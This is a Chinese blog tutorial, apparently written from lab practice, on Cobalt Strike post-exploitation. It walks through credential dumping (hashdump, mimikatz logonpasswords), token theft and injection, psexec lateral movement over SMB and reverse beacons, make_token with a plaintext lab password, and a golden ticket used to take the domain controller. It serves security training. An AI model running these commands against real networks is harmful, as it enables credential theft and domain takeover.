CobaltStrike之后渗透
文中通过详细讲解CobaltStrike工具,更加深入的掌握CobaltStrike用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
CobaltStrike后渗透
获取跳板机权限:
当我们获取一个权限的时候,可以先使用命令获取hash:
hashdump #获取hash
使用命令获取信任主机:
net view #获取信任主机
使用命令或借助辅助模块来进行提权:
getsystem #提权命令
rev2self #退回原始权限
利用进程注入获取权限:
ps #查看进程
inject PID号 x64 Beacon_HTTP #当不设置x86 或者x64 默认x86
利用令牌窃取获取权限:
steal_token PID号 #注:最好使用system权限。
在cs中我们获取一个权限,如果没有带星号,那么则不能够完全控制,我们可以使用bypassuac来进行提权,这里我们可以使用辅助模块来完成:
区别就在于当我们可以完全控制时,则可以进行文件上传,如果没有完全控制,则不能进行上传。
当我们已经获取信任主机,则可以使用横向进行渗透:
但我们的先决条件是能够使用访问信任主机的目录:
dir \\12server2\C$ #这里必须使用administrator权限。
从图中可以看出,如果138这台主机如何和我们的被控机密码不一致时,则不能访问,反之可以访问:
然后我们在通过扫描来进行确定138这台主机的445端口是否开启:
当确定445开启,且可以访问目录,我们就可以利用psexec来进行建立通信:
获取内网域主机权限:
方法一(正向命令):
先建立正向监听器:
然后使用jump实现正向连接:
jump psexec 12server2 Beacon_SMB # 利用程序名 主机名 监听器名
假如连接的主机断开,我们可以使用link命令来进行恢复:
link 12server2 #link主机名
方法二(反向命令):
我们同样也可以反向来建立连接,当设备中没有防火墙的情况下,我们正向是没有问题的,但如果有防火墙,则我们需要使用反向才可连接
然后使用代理转发->转发上线 来建立连接:
rportfwd 8888 windows/beacon_reverse_tcp
这里就会多出一个反向的监听器:
然后我们使用jump 直接来进行反向连接:
注:这里只能是administrator权限,不能是system权限:
jump psexec 12server2 rev
当我们在进程中有域管理账户:
我们则可以利用mimikatz来抓取域控hash:
logonpasswords #获取域控的hash及明文密码
获取域控权限
方法一:
利用明文密码制作令牌,然后使用jump获取ad2域控权限,在将所有用户的hash导出:
这里我们成功获取了域控的明文密码,则可以制作令牌:
make_token redteam\administrator QWEasd123 #域\用户名 密码
能够成功访问到我们的ad2域控的目录后,则可以使用jump来获取域控权限:
jump psexec ad2 rev #使用此方法首先需确认445端口
方法二:
利用注入技术获取一个域控administrator权限的会话,然后使用插件将所有用户的hash导出:
我们这里使用system权限的会话注入到域控的进程中:
inject 2116 x64 rev #pid号 x64 监听器名
这里使用插件将所有账户的hash导出:
利用黄金票据来使我们的域控上线,首先获取一个域用户权限:
上面可以看出无法访问域控目录,建立黄金票据:
成功导入后,可以访问域控目录:
同样利用psexec ,ad2成功上线:
CobaltStrike之后渗透相关推荐
- CobaltStrike优质学习资源
0x00 前言 第一部分是关于CobaltStrike优质文章的集合 关于新特性BOF资源的整合 解决要用的时候找不到合适aggressor script或者BOF的问题 如果有本repo没有涉及的优 ...
- Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
Penetration_Testing_POC 搜集有关渗透测试中用到的POC.脚本.工具.文章等姿势分享,作为笔记吧,欢迎补充. Penetration_Testing_POC 请善用搜索[Ctrl ...
- 内网中CobaltStrike4.0(CS4)的渗透之旅
前言 这是老以前做的一个,主要熟悉一下cs4的新特性,还是发出来看看吧,流程简单一些,但是内网流程还是比较完整的.大家可以看看 本次靶机为红日安全的ATT&CK第五个靶场. http://vu ...
- 内网安全-域横向CobaltStrikeSPNRDP
案例1-域横向移动RDP传递-Mimikatz 除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作. RDP协议连接:判断对方远程桌面服 ...
- 第69天-内网安全-域横向 CobaltStrikeSPNRDP
思维导图 知识点 演示案例 域横向移动RDP传递-Mimikatz 除了之前讲到的IPC,WMI,SMB等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议进行连接操作. RDP 远程显 ...
- p69 内网安全-域横向 CobaltStrikeSPNRDP
数据来源 SPN(Secret Private Network缩写)_百度百科 (baidu.com) 演示案例 域横向移动RDP传递-Mimikatz 域横向移动SPN服务-探针,请求,导出,破解, ...
- 【Web安全】木马与后门
一.认识木马与后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法.在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷.但是,如果这些后门被其他人知道 ...
- Metasploit联动CobaltStrike渗透win11主机并提权
metasploit-bypassuac CobaltStrike CobaltStrike生成shellcode 基于python和C++的Shellcode加载器 C++ python Sigth ...
- cobaltstrike如何安装使用(包含CS联动MSF详细用法!)? (゚益゚メ) 渗透测试
文章目录 安装CS 安装Java CS服务器安装与后台运行 CS模拟实战 CS联动MSF MSF通过CS代理连接目标服务器 CS将监听目标传给MSF的会话(sessions)模块 MSF将会话(ses ...
最新文章
- mysql主键更新被锁_MySQL 的加锁处理,你都了解的一清二楚了吗?
- 【错误记录】Android Studio 编译时 Kotlin 代码编译报错 ( Not enough information to infer type variable T )
- 左值和左值引用、右值和右值引用
- SpringBoot回顾
- 向上2021·新消费品牌发展报告
- BZOJ3211 花神游历各国
- 宝塔面板之nginx 配置
- python爬虫xpath提取数据_python爬虫的页面数据解析和提取/xpath/bs4/jsonpath/正则(1)...
- 使用Cmder替换cmd,让开发更高效
- MTK通用驱动的安装
- MDM数据质量应用说明
- Pyhon3 批量合并哔哩哔哩缓存的m4s视频文件
- 一张思维导图完成淘宝精细化运营
- 从全面了解高级计量经济学体系+stata实操+实证研究前沿+论文+大数据机器学习+空间计量......._Stata高级计量经济学 陈强
- 24.FFmpeg学习笔记 - 用libavfilter转换原始音频格式1
- Vue前端实战——外卖商家
- matlab生成随机数,matlab随机数生成方法
- Linux下开源邮件系统Postfix+Extmail+Extman环境部署记录
- RSD和wlwmanifest是什么
- android传感器数据流程
热门文章
- 12.24魔术VS凯尔特人在线直播视频
- 阿里云服务器如何使用并且后续能干嘛
- 转载 各大流行linux版本评价
- Linux 网络命名空间
- 条款11:在operator=中处理“自我赋值”
- Mysql报错解决:Illegal mix of collations (utf8_general_ci,IMPLICIT) and (utf8mb4_general_ci,COERCIBLE)
- 漫画算法-学习笔记(17)
- word忘记密码处理
- js或者jQuery模拟点击提交按钮button,触发提交操作
- 宋甲伟老师 5G通信服务实战专家